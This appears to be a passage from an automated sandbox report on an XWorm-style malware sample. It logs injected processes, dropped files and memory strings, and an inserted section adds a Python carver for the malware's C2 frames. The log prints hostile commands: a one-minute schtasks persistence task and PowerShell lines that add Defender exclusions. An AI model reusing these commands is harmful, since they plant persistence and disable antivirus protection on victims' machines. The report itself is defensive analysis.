                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1B410000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EF2F790000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2023BB50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 560000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 940000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000Jump to behavior
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe" Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe (obfuscated PowerShell script body, truncated in the report)
                           Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
                           Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                           Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000010.00000002.3008522588.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.1784338217.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                           Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                           Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                           Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                           Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                           Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                           Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2b
                           Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
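                           The DeadXClient.exe memory strings above are the XWorm client's keep-alive frame: fields joined by the literal delimiter <Xwormmm>, with PING! as the command and Program Manager (the title of the Progman desktop window, which also turns up in the neighbouring winlogon.exe and dwm.exe strings) as the foreground-window field. The carver below is an added example, not code from this report or from the malware: it pulls such frames out of a raw memory dump and splits them into command and fields. The frame grammar it uses is an assumption made for carving (a command token followed by one or more delimited fields drawn from a conservative character set, so that adjacent heap bytes such as the quote and the "@" visible in the dump lines are not swallowed); the meaning of the trailing "0" field is not stated on the page and is left unlabelled. The dump fragment is constructed from the quoted strings.

```python
"""Carve XWorm-style "<Xwormmm>"-delimited frames out of a memory dump.

Added example (not from the Joe Sandbox report or the malware source). The
only facts taken from the report are the delimiter string and the observed
frame "PING!<Xwormmm>Program Manager<Xwormmm>0"; field semantics beyond the
leading command token are assumptions and are marked as such below.
"""
import re
from dataclasses import dataclass

DELIM = "<Xwormmm>"

# Assumed frame grammar, chosen for carving rather than taken from the malware:
#   <command><DELIM><field>(<DELIM><field>)*
# Fields are limited to a conservative character set so that unrelated heap
# bytes next to a frame (e.g. the "'" and "@" in the dump) are not absorbed.
_FRAME_RE = re.compile(
    r"(?P<cmd>[A-Za-z0-9_!]+)"
    r"(?:" + re.escape(DELIM) + r"[A-Za-z0-9 ._-]*)+"
)


@dataclass(frozen=True)
class Frame:
    command: str
    fields: tuple[str, ...]
    offset: int  # byte offset of the frame inside the dump


def carve_frames(dump: bytes) -> list[Frame]:
    """Return every delimited frame found in `dump`, in file order."""
    text = dump.decode("latin-1")  # 1:1 byte-to-char mapping keeps offsets exact
    frames = []
    for m in _FRAME_RE.finditer(text):
        cmd, *fields = m.group(0).split(DELIM)
        frames.append(Frame(cmd, tuple(fields), m.start()))
    return frames


def describe(frame: Frame) -> dict:
    """Label the fields of a PING! frame. The field names are assumptions."""
    info = {"command": frame.command, "offset": frame.offset}
    if frame.command == "PING!" and frame.fields:
        # Assumption: the first field is the foreground window title
        # ("Program Manager" is the title of the Progman desktop window).
        info["foreground_window"] = frame.fields[0]
        info["extra"] = frame.fields[1:]  # "0" in the report; meaning not stated
    else:
        info["fields"] = frame.fields
    return info


# Constructed dump fragment modelled on the strings quoted in the report; the
# stray "'" / "@" bytes and "Program Manager2b" are deliberate noise.
SAMPLE_DUMP = (
    b"\x00\x00'PING!<Xwormmm>Program Manager<Xwormmm>0@\x00"
    b"Program Manager2b\x00\x00"
    b"PING!<Xwormmm>Program Manager<Xwormmm>0\x00"
)

if __name__ == "__main__":
    for f in carve_frames(SAMPLE_DUMP):
        print(describe(f))
```

                           Run against a real process dump (for example the 00000001.00000002.2955878706.0000000002956000 region named above) the same carver yields the frame offsets, which is enough to pivot into the surrounding heap for the rest of the C2 buffer.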
                           Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_000002E86A0715C0 cpuid 6_3_000002E86A0715C0
                           Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Queries volume information: C:\Users\user\Desktop\mIURiU8n2P.exe VolumeInformation
                           Source: C:\Users\Public\DeadXClient.exe | Queries volume information: C:\Users\Public\DeadXClient.exe VolumeInformation
                           Source: C:\Users\Public\DeadXClient.exe | Queries volume information: C:\ VolumeInformation
                           Source: C:\Users\Public\DeadROOTkit.exe | Queries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformation
                           Source: C:\Users\Public\DeadROOTkit.exe | Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                           Source: C:\Users\Public\Deadsvchost.exe | Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                           Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
                           Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
                           Source: C:\Users\Public\Deadsvchost.exe | Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
